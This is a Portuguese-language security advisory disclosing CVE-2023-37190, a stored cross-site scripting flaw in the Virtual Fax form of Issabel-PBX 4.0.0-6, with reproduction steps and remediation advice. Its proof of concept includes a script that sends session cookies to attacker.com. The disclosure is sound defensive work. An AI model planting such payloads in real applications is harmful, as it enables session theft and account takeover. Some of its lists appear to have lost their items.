
Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado no Issabel-PBX versão 4.0.0-6. A aplicação não sanitiza e codifica adequadamente a entrada fornecida pelo usuário antes de armazená-la no banco de dados e posteriormente renderizá-la na interface web.
| Campo | Detalhes |
|---|---|
| CVE ID | CVE-2023-37190 |
| Vulnerabilidade | Cross-Site Scripting Armazenado (XSS) |
| Produto Afetado | Issabel-PBX |
| Versão Afetada | 4.0.0-6 |
| Severidade | Média (CVSS v3.1 Pontuação: 5.4) |
| Descoberto Por | Sahil Ojha |
| Data de Divulgação | 07 Julho 2023 |
| Fornecedor | Issabel |
| Código Fonte | IssabelFoundation/issabelPBX |
| Testado Em | Windows |
Uma vulnerabilidade de Cross-Site Scripting Armazenado (XSS) existe no Issabel-PBX versão 4.0.0-6. A aplicação não sanitiza e codifica adequadamente a entrada fornecida pelo usuário antes de armazená-la no banco de dados e posteriormente renderizá-la na interface web.
A vulnerabilidade está presente no módulo Virtual Fax, especificamente no formulário de criação "New Virtual Fax". Dois parâmetros de entrada — Virtual Fax Name e Caller ID Name — não passam por validação de entrada ou codificação de saída adequadas. Isso permite que um atacante autenticado com privilégios baixos injete e armazene permanentemente um payload malicioso de JavaScript na aplicação.
Uma vez armazenado, o script malicioso é automaticamente executado no navegador de qualquer usuário (incluindo administradores) que visite a página afetada, sem qualquer interação adicional necessária por parte do atacante.
Um atacante que explore com sucesso esta vulnerabilidade pode:
Como o payload é armazenado (persistente), ele afeta todos os usuários que visitarem a página vulnerável até que seja removido — tornando isso mais grave do que um XSS refletido.
Virtual Fax NameCaller ID NamePasso 1: Faça login na aplicação web Issabel-PBX usando credenciais válidas.
Passo 2: Navegue até Fax → Virtual Fax → New Virtual Fax.
Injete o seguinte payload XSS no campo Virtual Fax Name e/ou Caller ID Name:
<script>alert('XSS-CVE-2023-37190')</script>
Para uma prova de conceito mais impactante demonstrando roubo de cookies de sessão (nota: em ataques reais, HTTPS é usado para evitar expor cookies roubados em trânsito):
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
O formulário preenchido com o payload injetado deve se parecer com a captura de tela abaixo:

Passo 3: Clique no botão Save para enviar o formulário. O payload agora está armazenado persistentemente no banco de dados da aplicação.
Passo 4: Navegue até a página de listagem do Virtual Fax (ou faça outro usuário — como um administrador — visitar a página). O script armazenado será executado automaticamente no navegador do visitante, conforme mostrado abaixo:

Recomenda-se fortemente que usuários e administradores do Issabel-PBX apliquem as seguintes medidas:
<, >, ", ', &).Content-Security-Policy rigoroso para limitar as fontes das quais scripts podem ser executados, reduzindo o impacto de vulnerabilidades XSS.Sahil Ojha
Pesquisador de Segurança
GitHub: @sahiloj
Aviso: Este repositório é destinado apenas para fins educacionais e de divulgação responsável. As informações aqui fornecidas não devem ser usadas para atacar sistemas sem permissão explícita por escrito do proprietário do sistema. O autor não é responsável pelo uso indevido destas informações.
| Métrica | Valor |
|---|
| Pontuação Base | 5,4 (Média) |
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Baixos |
| Interação do Usuário | Obrigatória |
| Escopo | Alterado |
| Confidencialidade | Baixa |
| Integridade | Baixa |
| Disponibilidade | Nenhum |